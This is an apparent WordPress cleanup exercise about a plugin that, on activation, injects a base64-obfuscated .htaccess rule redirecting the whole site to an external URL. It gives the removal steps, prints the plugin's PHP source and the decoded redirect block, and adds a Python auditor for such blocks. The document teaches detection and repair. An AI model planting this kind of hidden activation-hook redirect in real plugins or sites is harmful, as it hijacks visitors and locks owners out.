Spam redirect: Hacked .htaccess

Install and activate the attached plugin.

Download Zip – ilovedc.zip

Expected Outcome

When activated, you are immediately redirected to a different site. You cannot go back to your site at all. Ever.


How to fix

The first step is, of course, to delete this plugin. However, even after doing so, you still can’t get back to your site.

Whenever this happens, it’s likely that the plugin left something on your site. Redirects that are instantaneous are usually caused by something injected into your .htaccess or index.php file. In this case, the .htaccess has the following:

# BEGIN I Love DC
<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteBase /
        RewriteRule ^.*$ http://www.youtube.com/watch?v=oHg5SJYRHA0 [L,R=301]
</IfModule>
# END I Love DC

(If you are running WordPress out of its own directory, the .htaccess will be in that folder. For example, if the site is in /home/user/domain.com/blog/, the .htaccess would be there.)

Once you delete that section from your .htaccess, the ‘hack’ goes away.


Understanding what happened

The code of the plugin itself is very simple. The plugin contains no useful code at all; all it does is call insert_with_markers(), which WordPress (legitimately) uses to add .htaccess rules.

class ILoveDCPlugin {
     static function install() {
		$htaccess = trailingslashit(ABSPATH).'.htaccess'; 
		$data = base64_decode('PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+CiAgICAgICAgUmV3cml0ZUVuZ2luZSBPbgogICAgICAg
IFJld3JpdGVCYXNlIC8KICAgICAgICBSZXdyaXRlUnVsZSBeLiokIGh0dHA6Ly93d3cueW91dHVi
ZS5jb20vd2F0Y2g/dj1vSGc1U0pZUkhBMCBbTCxSPTMwMV0KPC9JZk1vZHVsZT4K');
		insert_with_markers($htaccess, 'I Love DC', explode( "\n",$data));
     }
}

register_activation_hook( __FILE__, array('ILoveDCPlugin', 'install') );

When a plugin uses base64_decode(), it is almost always doing something a little nefarious. Base64 is an encoding, not encryption, so no key is needed to read it: you can decode the string with Coderstoolbox, and it translates directly to the .htaccess rules we saw.

Long term, the fix is to delete the plugin and never ever use it again.
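
A defender's check for the two things this page walks through, as an added example that is not part of the plugin or of WordPress: audit_htaccess() lists external redirects inside .htaccess marker blocks that are not on an allow-list, and decode_base64_literals() decodes string literals passed to base64_decode() so they can be read offline. The function names, the allow-list and the sample .htaccess are assumptions constructed for illustration; the injected block and the base64 string are the ones shown above.

```python
import base64
import re

# Assumption: only stock WordPress markers are trusted; extend with plugins you trust.
KNOWN_MARKERS = {"WordPress"}

BLOCK_RE = re.compile(r"^# BEGIN ([^\n]+?)[ \t]*\n(.*?)^# END \1[ \t]*$", re.M | re.S)
# An absolute-URL substitution makes mod_rewrite send the visitor to another host.
EXTERNAL_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(https?://\S+)", re.M | re.I)
B64_RE = re.compile(r"base64_decode\(\s*(['\"])(.*?)\1\s*\)", re.S)

def audit_htaccess(text):
    """Return (marker, pattern, target) for external redirects in unknown blocks."""
    return [
        (block[1], rule[1], rule[2])
        for block in BLOCK_RE.finditer(text)
        if block[1] not in KNOWN_MARKERS
        for rule in EXTERNAL_RE.finditer(block[2])
    ]

def decode_base64_literals(php_source):
    """Decode each string literal passed directly to base64_decode()."""
    return [
        # Literals are often wrapped across lines, so drop whitespace first.
        base64.b64decode("".join(m[2].split())).decode("utf-8", "replace")
        for m in B64_RE.finditer(php_source)
    ]

# Constructed sample: a minimal WordPress block plus the block shown on this page.
SAMPLE_HTACCESS = """# BEGIN WordPress
RewriteRule . /index.php [L]
# END WordPress
# BEGIN I Love DC
<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteBase /
        RewriteRule ^.*$ http://www.youtube.com/watch?v=oHg5SJYRHA0 [L,R=301]
</IfModule>
# END I Love DC
"""
# The base64_decode() call from the plugin source on this page, wrapped as shown.
SAMPLE_PHP = """$data = base64_decode('PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+CiAgICAgICAgUmV3cml0ZUVuZ2luZSBPbgogICAgICAg
IFJld3JpdGVCYXNlIC8KICAgICAgICBSZXdyaXRlUnVsZSBeLiokIGh0dHA6Ly93d3cueW91dHVi
ZS5jb20vd2F0Y2g/dj1vSGc1U0pZUkhBMCBbTCxSPTMwMV0KPC9JZk1vZHVsZT4K');"""

if __name__ == "__main__":
    print(audit_htaccess(SAMPLE_HTACCESS))
    print(decode_base64_literals(SAMPLE_PHP)[0])
```

Run audit_htaccess() against the .htaccess in the WordPress directory and decode_base64_literals() against a plugin's PHP files before activating it; an empty list from the first means no unknown marker block redirects off-site.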